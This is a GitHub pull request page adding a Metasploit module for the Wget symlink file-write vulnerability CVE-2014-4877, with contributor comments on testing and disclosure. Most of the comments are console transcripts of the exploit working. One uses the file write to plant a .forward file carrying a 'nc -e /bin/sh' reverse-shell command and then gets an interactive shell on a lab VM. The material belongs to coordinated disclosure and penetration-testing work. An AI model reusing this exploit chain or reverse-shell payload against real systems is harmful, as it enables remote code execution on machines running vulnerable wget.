Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for CVE-2014-4877 (Wget) #4088

Merged
merged 1 commit into from Oct 28, 2014
Merged

Add module for CVE-2014-4877 (Wget) #4088

merged 1 commit into from Oct 28, 2014

Conversation

hdm
Copy link
Contributor

@hdm hdm commented Oct 28, 2014

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target's filesystem. To specify content for the file, use the "file:/path" syntax for the TARGET_DATA option.

Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

Already tested successfully:

msf auxiliary(wget_symlink_file_write) > exploit
[*] Auxiliary module execution completed
msf auxiliary(wget_symlink_file_write) > 
[+] Targets should run: $ wget -m ftp://173.255.206.36:2121/
[*] Server started.
[*] 1.2.3.4:43785 Logged in with user 'anonymous' and password 'anonymous'...
[*] 1.2.3.4:43785 -> LIST -a
[*] 1.2.3.4:43785 -> CWD /UccCkHMfFV43fxH
[*] 1.2.3.4:43785 -> LIST -a
[*] 1.2.3.4:43785 -> RETR pwned
[+] 1.2.3.4:43785 Hopefully wrote 21 bytes to /tmp/pwned
Interrupt: use the 'exit' command to quit
msf auxiliary(wget_symlink_file_write) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf auxiliary(wget_symlink_file_write) >

@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

Note, the rapid7 blog post will autopublish at 9am central time on Oct 28 (that's the disclosure date we provided to the maintainer and CERT/CC).

@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

I'll land this in the morning as well, which will close #4077.

@wchen-r7 wchen-r7 added module hotness Something we're really excited about labels Oct 28, 2014
@wvu
Copy link
Contributor

wvu commented Oct 28, 2014

Updated the PR's description with the module's description. :)

@wvu
Copy link
Contributor

wvu commented Oct 28, 2014

Working nicely for me with .forward. :)

msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf exploit(handler) > set lhost 172.16.126.1
lhost => 172.16.126.1
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.126.1:4444
[*] Starting the payload handler...

msf exploit(handler) > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > set target_file /home/msfadmin/.forward
target_file => /home/msfadmin/.forward
msf auxiliary(wget_symlink_file_write) > set target_data '\msfadmin, "| nc -e /bin/sh 172.16.126.1 4444 > /dev/null 2>&1 &"'
target_data => \msfadmin, "| nc -e /bin/sh 172.16.126.1 4444 > /dev/null 2>&1 &"
msf auxiliary(wget_symlink_file_write) > run
[*] Auxiliary module execution completed
msf auxiliary(wget_symlink_file_write) >
[+] Targets should run: $ wget -m ftp://10.6.0.198:2121/
[*] Server started.
[*] 172.16.126.129:45534 Logged in with user 'anonymous' and password 'anonymous'...
[*] 172.16.126.129:45534 -> LIST
[*] 172.16.126.129:45534 -> CWD /i8KLeF8P6O2P3xc
[*] 172.16.126.129:45534 -> LIST
[*] 172.16.126.129:45534 -> CWD /i8KLeF8P6O2P3xc
[*] 172.16.126.129:45534 -> RETR .forward
[+] 172.16.126.129:45534 Hopefully wrote 65 bytes to /home/msfadmin/.forward
[*] Command shell session 1 opened (172.16.126.1:4444 -> 172.16.126.129:33128) at 2014-10-28 06:43:23 -0500

msf auxiliary(wget_symlink_file_write) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

I'm curious if this affects a normal OSX build. I assume it ships with wget. @jvazquez-r7 can you do a quick wget --version? If the version is different from 1.14, then it'd be nice to update the module description.

I know that Ubuntu is vulnerable today and I don't see anything on the Ubuntu Security Notices page: http://www.ubuntu.com/usn/ . I'm opening a bug now, here: https://launchpad.net/ubuntu/+source/wget/+bugs

@todb-r7 todb-r7 merged commit 64c206f into rapid7:master Oct 28, 2014
todb-r7 pushed a commit that referenced this pull request Oct 28, 2014
Land #4088, wget exploit
dade6b9 
Fixes #4077 as well.
@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

Bug against Ubuntu filed: https://bugs.launchpad.net/ubuntu/+source/wget/+bug/1386711

@todb-r7
Copy link

todb-r7 commented Oct 28, 2014

Apparently, OSX dosn't usually ship with wget after all. Yay.

@wvu
Copy link
Contributor

wvu commented Oct 28, 2014

I checked an older version of OS X, so I'm probably wrong. Maybe OS X uses the GNU userland now. Who knows! Strange that there's no fetch, though.

@julieqiu julieqiu mentioned this pull request Dec 22, 2021
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@todb-r7 todb-r7

Labels
hotness Something we're really excited about module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@hdm @todb-r7 @wvu @wchen-r7